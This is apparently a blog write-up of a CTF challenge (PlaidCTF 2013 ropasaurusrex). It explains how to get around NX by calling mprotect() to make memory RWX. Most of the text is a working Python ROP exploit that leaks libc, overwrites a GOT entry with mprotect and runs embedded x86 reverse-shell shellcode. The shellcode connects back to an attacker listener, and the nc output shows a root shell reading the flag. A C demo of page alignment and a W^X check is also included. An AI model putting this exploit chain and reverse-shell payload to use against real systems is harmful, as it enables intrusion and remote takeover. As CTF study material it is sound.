Prototype of mprotect()
int mprotect(void *addr, size_t len, int prot);
Up to now I had mostly used the ordinary ROP technique of calling the system() function.
It turns out, however, that even with the NX bit set you can run shellcode by calling the mprotect() function.
mprotect() changes the access permissions of a given memory region.
So passing 7 (PROT_READ | PROT_WRITE | PROT_EXEC) as the prot argument makes the region RWX.
+ One more thing to watch: the void *addr argument must be a multiple of 0x1000, i.e. page-aligned.
+ The binary used is the PlaidCTF rop... one I wrote about in an earlier post.
http://err0rless313.tistory.com/entry/Plaid-CTF-2013-ropasaurusrex
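The two constraints stated above (prot = 7 is exactly PROT_READ | PROT_WRITE | PROT_EXEC, and addr must be page-aligned) can be checked directly against the kernel. This is an added example, not code from the original post; it maps an anonymous page, shows that an unaligned addr is rejected with EINVAL, and includes a small W^X check of the kind a hardened allocator or loader would apply before honouring such a request.

```c
#define _GNU_SOURCE
#include <errno.h>
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <sys/mman.h>
#include <unistd.h>

/* True when addr is a multiple of align (align must be a power of two). */
int aligned_to(uintptr_t addr, uintptr_t align) {
    return (addr & (align - 1)) == 0;
}

/* True when prot asks for write and execute at once, which is what prot = 7 does.
   A W^X policy would refuse such a request. */
int prot_is_wx(int prot) {
    return (prot & PROT_WRITE) && (prot & PROT_EXEC);
}

/* Calls mprotect() and returns 0 on success or the errno it set. */
int mprotect_errno(void *addr, size_t len, int prot) {
    return mprotect(addr, len, prot) == 0 ? 0 : errno;
}

/* Maps one anonymous read/write page; returns NULL on failure. */
void *map_rw_page(void) {
    size_t pg = (size_t)sysconf(_SC_PAGESIZE);
    void *p = mmap(NULL, pg, PROT_READ | PROT_WRITE,
                   MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
    return p == MAP_FAILED ? NULL : p;
}

/* Exercises the alignment rule: an unaligned addr fails with EINVAL, the
   page-aligned start of the same mapping is accepted. Returns 1 when both hold. */
int demo_alignment(void) {
    size_t pg = (size_t)sysconf(_SC_PAGESIZE);
    char *page = map_rw_page();
    if (!page) return 0;
    int unaligned = mprotect_errno(page + 1, 16, PROT_READ); /* expect EINVAL */
    int aligned   = mprotect_errno(page, pg, PROT_READ);     /* expect 0 */
    munmap(page, pg);
    return unaligned == EINVAL && aligned == 0;
}

int main(void) {
    printf("prot 7 requests W+X: %d\n", prot_is_wx(7));
    printf("alignment rule holds: %d\n", demo_alignment());
    return 0;
}
```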
```python
#!/usr/bin/env python
#-*-coding:utf8-*-
from socket import *
from struct import pack, unpack

IP = "192.168.1.148"
PORT = 1025

def sockSet(i, p):
    s = socket(AF_INET, SOCK_STREAM)
    s.connect((i, p))
    return s

p = lambda x : pack("<L", x)          # pack a 32-bit little-endian value
up = lambda x : unpack("<L", x)[0]    # unpack a 32-bit little-endian value
con = lambda s, i, p : s.connect((i, p))

s = sockSet(IP, PORT)

###########################################
shellcode = (
    "\x68"
    "\xC0\xA8\x01\x82"    # IP ADDRESS
    "\x5E\x66\x68"
    "\xD9\x03"            # PORT NUMBER
    "\x5F\x6A\x66\x58\x99\x6A\x01\x5B\x52\x53\x6A\x02"
    "\x89\xE1\xCD\x80\x93\x59\xB0\x3F\xCD\x80\x49\x79"
    "\xF9\xB0\x66\x56\x66\x57\x66\x6A\x02\x89\xE1\x6A"
    "\x10\x51\x53\x89\xE1\xCD\x80\xB0\x0B\x52\x68\x2F"
    "\x2F\x73\x68\x68\x2F\x62\x69\x6E\x89\xE3\x52\x53"
    "\xEB\xCE"
)

write_plt = p(0x0804830c)
write_got = p(0x08049614)
read_plt = p(0x0804832c)
pop3ret = p(0x080484B6)
dataSec = p(0x08049000)    # writable, page-aligned region that receives the shellcode
offset = 0x0000C480        # distance from write to mprotect in this libc

payload = ""
payload += "\x90" * 140

# write(1, write_got, 0xff): leak the resolved address of write
payload += write_plt
payload += pop3ret
payload += p(0x01)
payload += write_got
payload += p(0xff)

# read(0, dataSec, 0xff): place the shellcode in .data
payload += read_plt
payload += pop3ret
payload += p(0x00)
payload += dataSec
payload += p(0xff)

# read(0, write_got, 4): overwrite write@got with the address of mprotect
payload += read_plt
payload += pop3ret
payload += p(0x00)
payload += write_got
payload += p(0x04)

# write@plt now resolves to mprotect(dataSec, 0xff, 7); return into dataSec
payload += write_plt
payload += dataSec
payload += dataSec
payload += p(0xff)
payload += p(0x07)

s.send(payload + "\n")

write_libc = up(s.recv(1024)[:4])
mprotect_libc = write_libc + offset

print "[*] write@libc : " + hex(write_libc)
print "[*] mprotect@libc : " + hex(mprotect_libc)

s.send(shellcode + "\n")
s.send(p(mprotect_libc) + "\n")
```
```text
root@Kali ~/s/e/ropasaurusrex# nc -lvp 55555
listening on [any] 55555 ...
192.168.1.148: inverse host lookup failed: Unknown server error : ...
connect to [192.168.1.130] from (UNKNOWN) [192.168.1.148] 57136
cat /root/sys_hack/pCTF/key
flag is {you_cant_stop_the_ropasaurusrex}
```